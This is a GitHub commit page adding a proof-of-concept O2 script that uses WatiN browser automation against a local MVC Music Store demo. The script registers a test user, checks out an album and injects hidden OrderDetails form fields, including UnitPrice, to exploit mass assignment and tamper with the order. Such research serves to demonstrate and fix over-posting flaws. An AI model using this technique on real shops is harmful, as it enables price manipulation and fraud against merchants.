Permalink
Browse files

First O2 script with IE Automation and exploit

  • Loading branch information...
1 parent ea763a9 commit a701d6967a2111c308d59424bc7578003698ff44 @DinisCruz DinisCruz committed May 14, 2012
Showing with 120 additions and 0 deletions.
  1. +120 −0 O2_Scripts/PoC - MVC Music Store exploit 1.h2
@@ -0,0 +1,120 @@
+<?xml version="1.0"?>
+<H2>
+ <SourceCode>
+var ie = "ie_Fyila".o2Cache&lt;WatiN_IE&gt;(()=&gt; panel.clear().add_IE()).silent(true); // ie ramdon value for o2cache makes this object to unique amongst multiple instances of this control
+
+var site = "http://localhost.:26641";
+//ie.if_NoPageLoaded(()=&gt; ie.open(site));
+
+ie.disableFlashing();
+//ie.enableFlashing();
+
+Action&lt;string,string&gt; login =
+ (username, password)=&gt;{
+ if (ie.title().eq("Log On").isFalse())
+ ie.open(site + "/Account/LogOn");
+
+ ie.field("UserName").value(username);
+ ie.field("Password").value(password);
+ ie.button("Log On").click();
+ };
+Action&lt;string,string,string&gt; register =
+ (username, password,email)=&gt;{
+ ie.open(site + "/Account/Register");
+ ie.field("UserName").value(username);
+ ie.field("Email").value(email);
+ ie.field("Password").value(password);
+ ie.field("ConfirmPassword").value(password);
+ ie.button("Register").click();
+ };
+Action loginAsTestUser =
+ ()=&gt;{
+ var user1_name = "test_user".add_RandomLetters(5);
+ var user1_email = "test@testuser.com";
+ var user1_pwd = "a pwd".add_RandomLetters(10);
+ register(user1_name, user1_pwd, user1_email);
+ //ie.open(site + "/Account/LogOff");
+ //login(user1_name, user1_pwd);
+ };
+
+Action selectTestProductAndCheckout =
+ ()=&gt;{
+ ie.link("Rock").scrollIntoView().flash().click();
+ ie.link("Surfing with the Alien (Remastered)").scrollIntoView().flash().click();
+ ie.link("Add to cart").flash().click();
+ ie.link("Checkout &gt;&gt;").flash().click();
+ };
+
+Action populateSubmitOrder =
+ ()=&gt;{
+ var Address = "...Address";
+ var City = "...City";
+ var Country = "...Country";
+ var Email = "Email@email.com";
+ var FirstName = "...FirstName";
+ var LastName = "...LastName";
+ var Phone = "...Phone";
+ var PostalCode = "AAA BBB";
+ var State = "...State";
+ var PromoCode = "FREE"; // currently hard coded promotional code
+
+ ie.field("Address").value(Address);
+ ie.field("City").value(City);
+ ie.field("Country").value(Country);
+ ie.field("Email").value(Email);
+ ie.field("FirstName").value(FirstName);
+ ie.field("LastName").value(LastName);
+ ie.field("Phone").value(Phone);
+ ie.field("PostalCode").value(PostalCode);
+ ie.field("PromoCode").value(PromoCode);
+ ie.field("State").value(State);
+ };
+Action submitOrder =
+ ()=&gt;{
+ ie.button("Submit Order").click();
+ };
+
+Action createOrderUsingTestUser =
+ ()=&gt;{
+ loginAsTestUser();
+ selectTestProductAndCheckout();
+ populateSubmitOrder();
+ submitOrder();
+ };
+
+
+Action&lt;string,string&gt; injectField =
+ (fieldName, value)=&gt;{
+ ie.field("FirstName")
+ .injectHtml_afterEnd("&lt;br&gt;{0}:&lt;input type=text name='{0}' value='{1}'/&gt;".format(fieldName, value));
+ };
+
+Action runExploit_1 =
+ ()=&gt;{
+ loginAsTestUser();
+ selectTestProductAndCheckout();
+ populateSubmitOrder();
+
+ //the following simulates adding this to the POST request: OrderDetails[0].OrderDetailId=1&amp;OrderDetails[0].OrderId=1&amp;OrderDetails[0].AlbumId=1&amp;OrderDetails[0].Quantity=1&amp;OrderDetails[0].UnitPrice=2000&amp;
+ injectField("OrderDetails[0].OrderDetailId","1");
+ injectField("OrderDetails[0].OrderId","1");
+ injectField("OrderDetails[0].AlbumId","1");
+ injectField("OrderDetails[0].Quantity","1");
+ injectField("OrderDetails[0].UnitPrice","2001");
+ submitOrder();
+ ie.open(site + "/OrderDetails");
+ };
+
+
+//selectTestProductAndCheckout();
+runExploit_1();
+
+
+return "done";
+
+
+//O2File:WatiN_IE_ExtensionMethods.cs
+//O2Ref:WatiN.Core.1x.dll
+//O2Tag_DontAddExtraO2Files; </SourceCode>
+ <ReferencedAssemblies />
+</H2>

0 comments on commit a701d69

Please sign in to comment.